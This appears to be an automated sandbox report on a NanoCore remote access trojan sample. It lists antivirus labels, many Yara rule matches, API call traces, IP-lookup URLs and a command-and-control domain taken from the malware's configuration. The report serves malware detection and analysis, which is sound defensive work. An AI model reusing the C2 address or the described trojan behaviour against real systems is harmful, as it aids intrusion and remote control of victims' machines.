Source: 13.2.RegAsm.exe.400000.0.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 13.2.RegAsm.exe.5b70000.6.unpack	Avira: Label: TR/NanoCore.fadte
Source: 14.2.RMActivate_isv.exe.bat.16e0000.1.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 0.2.wIQLBHYbqz.exe.14a0000.1.unpack	Avira: Label: TR/Dropper.MSIL.Gen7

Source: wIQLBHYbqz.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll

Jump to behavior

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor	URLs:
Source: Malware configuration extractor	URLs: megida.hopto.org

Source: wIQLBHYbqz.exe, 00000000.00000002.616258371.00000000030B4000.00000004.00000001.sdmp	String found in binary or memory: http://bot.whatismyipaddress.com
Source: wIQLBHYbqz.exe, 00000000.00000002.614810428.0000000000FFB000.00000004.00000001.sdmp	String found in binary or memory: http://checkip.dyndns.orglTime
Source: wIQLBHYbqz.exe, 00000000.00000002.614810428.0000000000FFB000.00000004.00000001.sdmp	String found in binary or memory: http://www.myexternalip.com/raw
Source: RMActivate_isv.exe.bat, 0000000E.00000002.615594870.0000000003129000.00000004.00000001.sdmp	String found in binary or memory: https://api.ipify.org
Source: wIQLBHYbqz.exe, 00000000.00000002.616316017.00000000030D3000.00000004.00000001.sdmp	String found in binary or memory: https://api.ipify.orgDi

Source: unknown

DNS traffic detected: queries for: megida.hopto.org

Source: wIQLBHYbqz.exe, 00000000.00000002.616316017.00000000030D3000.00000004.00000001.sdmp

Binary or memory string: _WINAPI_GETRAWINPUTDATA3

Source: C:\Users\user\Desktop\wIQLBHYbqz.exe

Code function: 0_2_0048CDAC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

0_2_0048CDAC

Source: C:\Users\user\Desktop\wIQLBHYbqz.exe

Code function: 0_2_00402344 GetCursorPos,ScreenToClient,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetWindowLongW,

0_2_00402344

E-Banking Fraud:

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 22.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.wIQLBHYbqz.exe.39cbe78.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.wIQLBHYbqz.exe.39cb008.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegAsm.exe.5b70000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.RMActivate_isv.exe.bat.3668768.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegAsm.exe.5b74629.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.RegAsm.exe.40d2a4d.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.RegAsm.exe.40ce424.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegAsm.exe.42495ee.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.RMActivate_isv.exe.bat.3668768.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.wIQLBHYbqz.exe.3918578.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.RMActivate_isv.exe.bat.3668768.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegAsm.exe.5b70000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.RegAsm.exe.40ce424.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.wIQLBHYbqz.exe.3918578.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.wIQLBHYbqz.exe.39cb008.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.RMActivate_isv.exe.bat.3668768.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.wIQLBHYbqz.exe.39cb008.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.wIQLBHYbqz.exe.39cbe78.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.wIQLBHYbqz.exe.39cbe78.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.RMActivate_isv.exe.bat.16e0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.wIQLBHYbqz.exe.38c4300.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.wIQLBHYbqz.exe.39cbe78.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegAsm.exe.424e424.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.wIQLBHYbqz.exe.38c4300.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.RMActivate_isv.exe.bat.3668768.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.wIQLBHYbqz.exe.39cb008.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.wIQLBHYbqz.exe.39cbe78.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.RMActivate_isv.exe.bat.35a0a20.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.RMActivate_isv.exe.bat.3668768.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.RMActivate_isv.exe.bat.3668768.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegAsm.exe.424e424.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegAsm.exe.4252a4d.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.wIQLBHYbqz.exe.14a0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.RMActivate_isv.exe.bat.3668768.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.RegAsm.exe.40c95ee.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.wIQLBHYbqz.exe.39cbe78.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.RMActivate_isv.exe.bat.35d3428.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.RMActivate_isv.exe.bat.35d3428.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.RMActivate_isv.exe.bat.356e018.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.617258087.0000000005B70000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.581083346.0000000003668000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.453308954.000000000399F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.611459498.0000000003081000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.580718643.0000000003611000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.452029104.0000000003975000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.614749797.00000000016E2000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.614883445.00000000014A2000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.609808438.0000000000402000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.609719074.0000000000402000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.580844038.0000000003B80000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.617706572.0000000003910000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.592051979.0000000003562000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.580617027.00000000035B9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.450606191.0000000004911000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.615169994.0000000004247000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.617309688.0000000003893000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.580586671.000000000369C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.611621495.0000000004081000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.580975519.000000000363C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.450818264.000000000391C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.466877574.00000000039B2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.618062231.0000000003997000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.618678183.0000000004910000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: wIQLBHYbqz.exe PID: 4904, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 4936, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RMActivate_isv.exe.bat PID: 6788, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7040, type: MEMORYSTR

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 22.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 22.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0.3.wIQLBHYbqz.exe.39cbe78.1.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.3.wIQLBHYbqz.exe.39cbe78.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0.2.wIQLBHYbqz.exe.39cb008.4.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.2.wIQLBHYbqz.exe.39cb008.4.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.RegAsm.exe.56f0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.RegAsm.exe.5b70000.6.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 14.3.RMActivate_isv.exe.bat.3668768.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 14.3.RMActivate_isv.exe.bat.3668768.2.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.RegAsm.exe.5b74629.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 22.2.RegAsm.exe.40d2a4d.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 22.2.RegAsm.exe.40ce424.4.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.RegAsm.exe.42495ee.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.RegAsm.exe.42495ee.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0.2.wIQLBHYbqz.exe.3918578.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 14.3.RMActivate_isv.exe.bat.3668768.3.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 14.3.RMActivate_isv.exe.bat.3668768.3.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 14.3.RMActivate_isv.exe.bat.3668768.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.2.wIQLBHYbqz.exe.3918578.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 14.3.RMActivate_isv.exe.bat.3668768.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.RegAsm.exe.5b70000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 22.2.RegAsm.exe.40ce424.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.2.wIQLBHYbqz.exe.3918578.3.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.2.wIQLBHYbqz.exe.3918578.3.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0.3.wIQLBHYbqz.exe.39cb008.3.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.3.wIQLBHYbqz.exe.39cb008.3.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 14.3.RMActivate_isv.exe.bat.3668768.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 14.3.RMActivate_isv.exe.bat.3668768.0.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0.2.wIQLBHYbqz.exe.39cb008.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.2.wIQLBHYbqz.exe.39cb008.4.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0.3.wIQLBHYbqz.exe.39cbe78.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.3.wIQLBHYbqz.exe.39cbe78.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0.3.wIQLBHYbqz.exe.39cbe78.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.3.wIQLBHYbqz.exe.39cbe78.0.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 14.2.RMActivate_isv.exe.bat.16e0000.1.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 14.2.RMActivate_isv.exe.bat.16e0000.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0.2.wIQLBHYbqz.exe.38c4300.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.2.wIQLBHYbqz.exe.38c4300.2.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0.3.wIQLBHYbqz.exe.39cbe78.2.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.3.wIQLBHYbqz.exe.39cbe78.2.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.RegAsm.exe.424e424.2.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.2.wIQLBHYbqz.exe.38c4300.2.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.2.wIQLBHYbqz.exe.38c4300.2.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 14.3.RMActivate_isv.exe.bat.3668768.2.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 14.3.RMActivate_isv.exe.bat.3668768.2.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0.3.wIQLBHYbqz.exe.39cb008.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.3.wIQLBHYbqz.exe.39cb008.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0.3.wIQLBHYbqz.exe.39cbe78.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.3.wIQLBHYbqz.exe.39cbe78.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 14.3.RMActivate_isv.exe.bat.35a0a20.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 14.3.RMActivate_isv.exe.bat.35a0a20.4.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 14.3.RMActivate_isv.exe.bat.3668768.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 14.3.RMActivate_isv.exe.bat.3668768.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 14.3.RMActivate_isv.exe.bat.3668768.1.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.RegAsm.exe.424e424.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.RegAsm.exe.32116dc.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.RegAsm.exe.4252a4d.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 14.3.RMActivate_isv.exe.bat.3668768.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 14.3.RMActivate_isv.exe.bat.3668768.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0.2.wIQLBHYbqz.exe.14a0000.1.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.2.wIQLBHYbqz.exe.14a0000.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 14.3.RMActivate_isv.exe.bat.3668768.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 22.2.RegAsm.exe.30a3c68.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 22.2.RegAsm.exe.40c95ee.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 22.2.RegAsm.exe.40c95ee.2.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0.3.wIQLBHYbqz.exe.39cbe78.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.3.wIQLBHYbqz.exe.39cbe78.2.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 14.3.RMActivate_isv.exe.bat.35d3428.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 14.3.RMActivate_isv.exe.bat.35d3428.5.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 14.3.RMActivate_isv.exe.bat.35d3428.5.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 14.3.RMActivate_isv.exe.bat.35d3428.5.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 14.3.RMActivate_isv.exe.bat.356e018.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 14.3.RMActivate_isv.exe.bat.356e018.6.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000D.00000002.617258087.0000000005B70000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000E.00000003.581083346.0000000003668000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000E.00000003.581083346.0000000003668000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000000.00000003.453308954.000000000399F000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000000.00000003.453308954.000000000399F000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000016.00000002.611459498.0000000003081000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000E.00000003.580718643.0000000003611000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000E.00000003.580718643.0000000003611000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000000.00000003.452029104.0000000003975000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000000.00000003.452029104.0000000003975000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000E.00000002.614749797.00000000016E2000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000E.00000002.614749797.00000000016E2000.00000040.00020000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000000.00000002.614883445.00000000014A2000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000000.00000002.614883445.00000000014A2000.00000040.00020000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000D.00000002.609808438.0000000000402000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000D.00000002.609808438.0000000000402000.00000040.00020000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000016.00000002.609719074.0000000000402000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000016.00000002.609719074.0000000000402000.00000040.00020000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000E.00000003.580844038.0000000003B80000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000E.00000003.580844038.0000000003B80000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000000.00000002.617706572.0000000003910000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000000.00000002.617706572.0000000003910000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000E.00000003.592051979.0000000003562000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000E.00000003.592051979.0000000003562000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000E.00000003.580617027.00000000035B9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000E.00000003.580617027.00000000035B9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000000.00000003.450606191.0000000004911000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000000.00000003.450606191.0000000004911000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000D.00000002.615169994.0000000004247000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000000.00000002.617309688.0000000003893000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000000.00000002.617309688.0000000003893000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000E.00000003.580586671.000000000369C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000E.00000003.580586671.000000000369C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000016.00000002.611621495.0000000004081000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000E.00000003.580975519.000000000363C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000E.00000003.580975519.000000000363C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000000.00000003.450818264.000000000391C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000000.00000003.450818264.000000000391C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000D.00000002.616663037.00000000056F0000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000000.00000003.466877574.00000000039B2000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000000.00000003.466877574.00000000039B2000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000000.00000002.618062231.0000000003997000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000000.00000002.618062231.0000000003997000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000000.00000002.618678183.0000000004910000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000000.00000002.618678183.0000000004910000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: wIQLBHYbqz.exe PID: 4904, type: MEMORYSTR	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: wIQLBHYbqz.exe PID: 4904, type: MEMORYSTR	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: RegAsm.exe PID: 4936, type: MEMORYSTR	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: RegAsm.exe PID: 4936, type: MEMORYSTR	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: RMActivate_isv.exe.bat PID: 6788, type: MEMORYSTR	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: RMActivate_isv.exe.bat PID: 6788, type: MEMORYSTR	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
